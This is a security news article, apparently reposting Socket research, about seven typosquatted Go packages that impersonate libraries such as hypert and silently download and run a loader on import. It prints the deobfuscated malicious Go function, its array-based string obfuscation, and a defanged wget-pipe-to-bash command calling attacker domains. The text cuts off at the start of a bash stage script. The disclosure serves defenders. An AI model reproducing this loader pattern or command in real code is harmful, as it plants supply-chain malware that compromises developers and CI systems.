Skip to content Skip to footer
0 items - $0.00 0
Menu

Typosquatted Go Packages Deliver Malware Loader Targeting Linux and macOS by feross

0CommentsShare Post
Typosquatted Go Packages Deliver Malware Loader Targeting Linux and macOS by feross
News

Typosquatted Go Packages Deliver Malware Loader Targeting Linux and macOS by feross

March 4, 2025
0Comments
Share This Article
Share Post
Newsletter

Sed ut perspiciatis unde.

Subscribe

Send to HN

Socket researchers have uncovered an ongoing malicious campaign infiltrating the Go ecosystem with typosquatted packages that install hidden loader malware targeting Linux and macOS systems. The threat actor has published at least seven packages impersonating widely used Go libraries, including one (github.com/shallowmulti/hypert) that appears to target financial-sector developers.

These packages share repeated malicious filenames and consistent obfuscation techniques, suggesting a coordinated threat actor capable of pivoting rapidly. As of this writing, they remain accessible on the Go Module Mirror. We have requested their removal and reported the associated GitHub repositories and user accounts.

Typosquatting “Hypert”#

In February 2025, the threat actor released four malicious packages on the Go Module Mirror that impersonate the legitimate github.com/areknoster/hypert library, a popular tool for testing HTTP API clients. These typosquatted clones – github.com/shallowmulti/hypert, github.com/shadowybulk/hypert, github.com/belatedplanet/hypert, and github.com/thankfulmai/hypert – embed concealed functions to enable remote code execution.

A search on the Go Module Mirror shows multiple malicious “hypert” packages (highlighted in red), all appearing above the legitimate “hypert” library (green) from github.com/areknoster/hypert.

Within github.com/shallowmulti/hypert, the malicious function qcJjJne() silently executes a shell command to download and run a remote script from alturastreet[.]icu, while github.com/shadowybulk/hypert decodes to https://host3ar[.]com/storage/de373d0df/a31546bf, and the packages github.com/thankfulmai/hypert and github.com/belatedplanet/hypert decode to https://binghost7[.]com/storage/de373d0df/a31546bf. In the shallowmulti/hypert variant, for instance, the malicious payload runs automatically via:

var ttDijVH = qcJjJne() // Forces qcJjJne() to run at import

Below is the deobfuscated, defanged, and annotated code snippet from the shallowmulti/hypert variant:

func qcJjJne() error {
    
    // Array of single-character strings used for obfuscation
    qAYW := []string{
        "d","O","n","t","|","u","d","/","d","s","a","1","0","r","a","g","e","u","-","s","&","/","t","t",
        "a","b","/","5","3","w","3","e","p","t","a","g","/"," ","b","l",".","s","c","s"," ","-","o","t",
        "4","r","/","h"," ","/","r"," ","h","t","b","i","7","e","/","t","3","6","f","a","e","i","e"," ",
        ":", "f"," ",
    }
    
    // /bin/sh and -c are used to invoke a shell command
    QJqmcouO := "/bin/sh"
    Tsfs := "-c"

    // The following line assembles the malicious command by concatenating elements of qAYW:
    // Result: "wget -O - https://alturastreet[.]icu/storage/de373d0df/a31546bf | /bin/bash &"
    fFadxxb := qAYW[29] + qAYW[15] + qAYW[70] + ... + qAYW[9] + qAYW[51] + qAYW[52] + qAYW[20]

    // Executes the malicious command in a shell, starting in the background
    exec.Command(QJqmcouO, Tsfs, fFadxxb).Start()
    return nil
}

The code is using array-based string obfuscation. The malicious command is hidden by splitting its components into an array of single-character strings and then reconstructing them in a non-sequential index pattern. This is designed to thwart basic static detection by hiding the malicious command.

Socket AI Scanner’s analysis, including contextual details about the malicious github.com/shallowmulti/hypert package.

Malicious Domain Typosquatting Tactics#

The malicious domain alturastreet[.]icu bears a superficial resemblance to alturacu.com, the legitimate online banking portal for Altura Credit Union. While alturacu.com clearly reflects its credit union affiliation, alturastreet[.]icu adopts an unrelated word “street”, paired with a less conventional top-level domain (.icu). This discrepancy suggests a calculated effort to mislead or confuse potential victims. The threat actor may be leveraging brand recognition around “Altura” for typosquatting or spearphishing campaigns specifically targeting Altura Credit Union users. The deliberate domain choice, unconventional TLD, and clear tie-in to malicious payloads illustrate the threat actor’s intent to exploit a reputable financial brand name, posing a notable security risk.

The search engine DuckDuckGo interprets “alturastreet” as related to “altura”, thus returning matches for alturacu.com and official Altura Credit Union pages.

Malicious Script Installs ELF File#

The malicious code initiates a script download that ultimately installs the f0eee999 ELF file. The command:

wget -O - https://alturastreet[.]icu/storage/de373d0df/a31546bf | /bin/bash &

retrieves a remote script from alturastreet[.]icu, pipes it directly into bash, and executes it in the background. As soon as a developer or CI/CD environment imports the package, the payload runs silently.

#!/bin/bash

cd ~
# 1. Moves into the current user's home directory

if [[ "$OSTYPE" == "linux-gnu"* ]];

Read More

Tags:
0Likes
Leave a comment

Leave a comment

In the Shadows of Innovation”

© 2025 HackTech.info. All Rights Reserved.

Sign Up to Our Newsletter

Be the first to know the latest updates

Whoops, you're not connected to Mailchimp. You need to enter a valid Mailchimp API key.